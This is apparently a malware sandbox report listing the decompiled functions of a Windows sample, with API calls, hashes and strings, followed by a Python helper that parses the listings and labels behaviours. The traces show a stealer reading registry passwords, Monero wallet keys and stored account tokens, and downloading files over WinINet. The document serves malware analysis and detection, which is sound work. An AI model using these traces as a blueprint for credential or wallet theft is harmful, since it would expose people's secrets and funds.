                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: b7738f4d9a1ad24747083475e47e309451c6315210b08dd07ae98ffe123c8bf5
                              • Instruction ID: 7fcf4503ac37c86f174ea7038f194d98a15e0ea9155b90dddb6e3a858c8902ed
                              • Opcode Fuzzy Hash: b7738f4d9a1ad24747083475e47e309451c6315210b08dd07ae98ffe123c8bf5
                              • Instruction Fuzzy Hash: 1E314975910149EBCB1AEBE5DC85FFFB378BB84701B104518F106A72A0DA38AD47CB52
                              APIs
                              • memset.MSVCRT ref: 009E7314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009E733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009E73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009E740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 009E7452
                              • HeapFree.KERNEL32(00000000), ref: 009E7459
                              • task.LIBCPMTD ref: 009E7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 5ed1f413e87e69bd879f889dc1684f4fe59a16e19ff61439e0913045861ec3b9
                              • Instruction ID: 9652e06e7b2929d8372d89730e3fd267b17f5ed1b79545b027db38d290bb9aaa
                              • Opcode Fuzzy Hash: 5ed1f413e87e69bd879f889dc1684f4fe59a16e19ff61439e0913045861ec3b9
                              • Instruction Fuzzy Hash: A2611BB590429C9BDB25DB91DC45BDAB7B8BF48300F0081E9E649A6181EB705FC9CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013BDE30,00000000,?,00A00E2C,00000000,?,00000000), ref: 009F8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009F8158
                              • __aulldiv.LIBCMT ref: 009F8172
                              • __aulldiv.LIBCMT ref: 009F8180
                              • wsprintfA.USER32 ref: 009F81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 69dee90a950c6a46df13944e86ee05fc4101def121f8d41a17c5210e1d958884
                              • Instruction ID: 373ee563dc0337da8ddf636bd700106f5476b4cf065043211bd2caaf5880ba41
                              • Opcode Fuzzy Hash: 69dee90a950c6a46df13944e86ee05fc4101def121f8d41a17c5210e1d958884
                              • Instruction Fuzzy Hash: 6821F7B1A4421CABDB10DFD5DC49FAFB7B9FB44B14F104609F705AB280D778A9018BA5
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                              • InternetOpenA.WININET(00A00DF7,00000001,00000000,00000000,00000000), ref: 009E610F
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009E618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009E61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 009E61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009E620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 009E6249
                              • InternetCloseHandle.WININET(?), ref: 009E6253
                              • InternetCloseHandle.WININET(00000000), ref: 009E6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: e5e089a00a4d513f2b603d4cd47d7b2645b454708908ee2b1e853739858dd8b7
                              • Instruction ID: e6a59c421562ed2d2c14bb1dc8b272aaeaa4193791aa8bf98cfc71afcf615db7
                              • Opcode Fuzzy Hash: e5e089a00a4d513f2b603d4cd47d7b2645b454708908ee2b1e853739858dd8b7
                              • Instruction Fuzzy Hash: C25182B1900208ABDB21DF51DC45BEE77B8FB44741F108098B705A72C1DB74AE85CF95
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              • lstrlen.KERNEL32(00000000), ref: 009EBC9F
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 009EBCCD
                              • lstrlen.KERNEL32(00000000), ref: 009EBDA5
                              • lstrlen.KERNEL32(00000000), ref: 009EBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 9eeb80dcc4435c22e86c71cf65277df318e7b7b971751e44e1e08182ef6788d8
                              • Instruction ID: 390b1c6b9ef5df51daf9ffa81e2fdf59abd873cc6805d05aa660a62c3b5e5626
                              • Opcode Fuzzy Hash: 9eeb80dcc4435c22e86c71cf65277df318e7b7b971751e44e1e08182ef6788d8
                              • Instruction Fuzzy Hash: A9B133B191010CABDB14FBA0DD56FFE7379AF94300F404568F60AA6091EF746E49CBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: fde8b2e804a07b7e0a08e309d986a58c841745b104c0e4558cffe24e6b8a7aa5
                              • Instruction ID: 87bc576b2eed75f4f90ec5227ee320e0c6478ff03ee4d5593ce32746c154fdd1
                              • Opcode Fuzzy Hash: fde8b2e804a07b7e0a08e309d986a58c841745b104c0e4558cffe24e6b8a7aa5
                              • Instruction Fuzzy Hash: 13F05E30928309EFD354AFE0E90972CBB70FB18B03F040198E609C6690D6705B42DB9A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009E4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E4FD1
                              • InternetOpenA.WININET(00A00DDF,00000000,00000000,00000000,00000000), ref: 009E4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 009E5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 009E5041
                              • InternetCloseHandle.WININET(?), ref: 009E50B9
                              • InternetCloseHandle.WININET(?), ref: 009E50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 3830db4aef3a8ae76a6f3acc68695693b662e8216e414938e34e0b566d56dd85
                              • Instruction ID: 5b389d7f2f03c61a249020ebdde02a6ee102dec82cd2b2ffefb2f9f577c5b20c
                              • Opcode Fuzzy Hash: 3830db4aef3a8ae76a6f3acc68695693b662e8216e414938e34e0b566d56dd85
                              • Instruction Fuzzy Hash: 423105B4A00218ABDB20CF54DC85BDCB7B5EB48704F1081E9FB09A7281C7706EC68F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009F8426
                              • wsprintfA.USER32 ref: 009F8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009F847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F8499
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,013BDF98,00000000,000F003F,?,00000400), ref: 009F84EC
                              • lstrlen.KERNEL32(?), ref: 009F8501
                              • RegQueryValueExA.ADVAPI32(00000000,013BDE90,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A00B34), ref: 009F8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: d11b0b7cd693fc4c5ff09a97bbc305a6d481f041b25c8545b57caff270e2eb11
                              • Instruction ID: 41ebdb94979de44159b16fd6a9c814ef7273d69006e3f8db78fd1a0f00461fec
                              • Opcode Fuzzy Hash: d11b0b7cd693fc4c5ff09a97bbc305a6d481f041b25c8545b57caff270e2eb11
                              • Instruction Fuzzy Hash: A621E7B191021CABDB64DB54DC85FE9B7B8FB48700F00C598E609A6180DF716A86CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,013ABAB8,00000000,00020119,00000000), ref: 009F76DD
                              • RegQueryValueExA.ADVAPI32(00000000,013BDF80,00000000,00000000,?,000000FF), ref: 009F76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 659080bab9bec201c31265cdfd1194e38f31055c820bd7b2ebe8745532dbc877
                              • Instruction ID: 1ffc0775198c9dfb0659f6f5becca950a41ceecdd2e4715f119c3c974aa0dbc9
                              • Opcode Fuzzy Hash: 659080bab9bec201c31265cdfd1194e38f31055c820bd7b2ebe8745532dbc877
                              • Instruction Fuzzy Hash: 05014BB5A14309BBEB10EBE4EC49FBEB7BCEB48B01F104454FB04D7691E6B499018B56
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F773B
                              • RegOpenKeyExA.ADVAPI32(80000002,013ABAB8,00000000,00020119,009F76B9), ref: 009F775B
                              • RegQueryValueExA.ADVAPI32(009F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009F777A
                              • RegCloseKey.ADVAPI32(009F76B9), ref: 009F7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: a058f07772c0cdff64b950307a3acd9aab5b675fd52276ba8049aa387e7b4ae4
                              • Instruction ID: 22c6bc14eac742b51a7afbcc531f1297acc8c682f286e3233ba7e8daa2ce0983
                              • Opcode Fuzzy Hash: a058f07772c0cdff64b950307a3acd9aab5b675fd52276ba8049aa387e7b4ae4
                              • Instruction Fuzzy Hash: F30162B5A50308BBDB10DBE0DC4AFBEB7B8EB48700F104558FB05A72C1DB70AA018B51
                              APIs
                              • memset.MSVCRT ref: 009F40D5
                              • RegOpenKeyExA.ADVAPI32(80000001,013BD3D8,00000000,00020119,?), ref: 009F40F4
                              • RegQueryValueExA.ADVAPI32(?,013BDA28,00000000,00000000,00000000,000000FF), ref: 009F4118
                              • RegCloseKey.ADVAPI32(?), ref: 009F4122
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4147
                              • lstrcat.KERNEL32(?,013BDA58), ref: 009F415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 849e709530236313baa043ca7177ef5244737bd7bc3e226a242e6c847cf72fcf
                              • Instruction ID: 693e0e2950580ec84ba902a095ec348964542da3589715b0c82a36e5a0081321
                              • Opcode Fuzzy Hash: 849e709530236313baa043ca7177ef5244737bd7bc3e226a242e6c847cf72fcf
                              • Instruction Fuzzy Hash: 48417AB6D10108ABDB25EBA0DC46FFE737DAB88300F408558B71656181EE759B898B92
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                              • LocalFree.KERNEL32(009E148F), ref: 009E9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 7d735ed42d941d7d66ec739b67c689e81fb7899601a349885538056593577f36
                              • Instruction ID: 9d2ac9d68676a004596f1e2978eb6ffc696f3bad01056a08066dea15f78b9d7c
                              • Opcode Fuzzy Hash: 7d735ed42d941d7d66ec739b67c689e81fb7899601a349885538056593577f36
                              • Instruction Fuzzy Hash: 8D311AB4A00209EFDF25CF95D985BAE77B9FF48340F108168E915A7290D778AE41CFA1
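The WinINet download routine, the two registry walks that build "%s\%s" subkey paths, the CurrentBuildNumber lookup and the CreateFileA/GetFileSizeEx/ReadFile routine above are recorded only as raw API bullets with hex arguments. The following is an added example, my own triage helper and not code from Joe Sandbox or from the analysed sample: it parses those bullet lines, decodes the hive handles, registry access masks, file access and creation dispositions, WinINet flags and CSIDL values that appear as bare hex, and maps each function's direct calls to a behaviour label. The behaviour table and the argument positions it reads are this example's own choices (positions follow the documented Win32 prototypes); the sample records are quoted verbatim from the function listings on this page.

```python
"""Triage helper for the per-function API bullets of a Joe Sandbox report.

Added example, not Joe Sandbox code and not code from the sample: parses
"Api.MODULE(args), ref: ADDR" lines, decodes well-known Win32 constants found
as raw hex arguments, and labels behaviour from the set of APIs called.
"""
import re

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
REG_ACCESS = [(0x20019, "KEY_READ"), (0x100, "KEY_WOW64_64KEY")]
FILE_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
INET_FLAGS = [(0x80000000, "INTERNET_FLAG_RELOAD"),
              (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
              (0x100, "INTERNET_FLAG_PRAGMA_NOCACHE")]


def _flags(value, table):
    """Name every flag in `table` fully set in `value`; raw hex if none match."""
    names = [name for bit, name in table if value & bit == bit]
    return "|".join(names) if names else hex(value)


# API -> [(argument index, parameter name, decoder)]; indices follow the Win32 prototypes.
DECODERS = {
    "RegOpenKeyExA": [(0, "hKey", lambda v: HIVES.get(v, hex(v))),
                      (3, "samDesired", lambda v: _flags(v, REG_ACCESS))],
    "CreateFileA": [(1, "dwDesiredAccess", lambda v: _flags(v, FILE_ACCESS)),
                    (4, "dwCreationDisposition", lambda v: DISPOSITION.get(v, hex(v)))],
    "InternetOpenUrlA": [(4, "dwFlags", lambda v: _flags(v, INET_FLAGS))],
    "SHGetFolderPathA": [(1, "csidl", lambda v: CSIDL.get(v, hex(v)))],
}

# A function earns a label when it calls every API in the set directly (subcalls excluded).
BEHAVIOURS = [
    ("downloads a URL with WinINet", {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile"}),
    ("walks registry subkeys", {"RegEnumKeyExA", "RegOpenKeyExA", "RegQueryValueExA"}),
    ("reads a registry value", {"RegOpenKeyExA", "RegQueryValueExA"}),
    ("reads a whole file into memory", {"CreateFileA", "GetFileSizeEx", "ReadFile"}),
]


def _arg(tok):
    """Eight hex digits (optionally negative) become an int; '?' and strings stay text."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-F]{8}", tok) else tok


def parse_calls(record):
    calls = []
    for m in CALL_RE.finditer(record):
        args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def decode_args(call):
    out = {}
    for idx, name, fn in DECODERS.get(call["api"], []):
        if idx < len(call["args"]) and isinstance(call["args"][idx], int):
            out[name] = fn(call["args"][idx])
    return out


def classify(calls):
    direct = {c["api"] for c in calls if c["subcall"] is None}
    return [label for label, needed in BEHAVIOURS if needed <= direct]


def triage(record):
    calls = parse_calls(record)
    decoded = [(c["api"], decode_args(c)) for c in calls if decode_args(c)]
    return {"calls": calls, "behaviours": classify(calls), "decoded": decoded}


# Records quoted from this report's function listings (constructed input for the demo).
WININET_RECORD = """
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009E4FCA
• RtlAllocateHeap.NTDLL(00000000), ref: 009E4FD1
• InternetOpenA.WININET(00A00DDF,00000000,00000000,00000000,00000000), ref: 009E4FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 009E5011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 009E5041
• InternetCloseHandle.WININET(?), ref: 009E50B9
• InternetCloseHandle.WININET(?), ref: 009E50C6
"""
REGISTRY_RECORD = """
• RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009F8426
• wsprintfA.USER32 ref: 009F8459
• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009F847B
  • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
• RegQueryValueExA.ADVAPI32(00000000,013BDF98,00000000,000F003F,?,00000400), ref: 009F84EC
"""
BUILD_RECORD = """
• RegOpenKeyExA.ADVAPI32(80000002,013ABAB8,00000000,00020119,009F76B9), ref: 009F775B
• RegQueryValueExA.ADVAPI32(009F76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009F777A
"""
FILE_RECORD = """
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
• GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
• ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
"""
APPDATA_RECORD = """
• lstrcat.KERNEL32(?,013BDA10), ref: 009F47DB
  • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
"""

if __name__ == "__main__":
    for name, rec in [("wininet", WININET_RECORD), ("registry", REGISTRY_RECORD),
                      ("build", BUILD_RECORD), ("file", FILE_RECORD), ("appdata", APPDATA_RECORD)]:
        result = triage(rec)
        print(name, result["behaviours"], result["decoded"])
```

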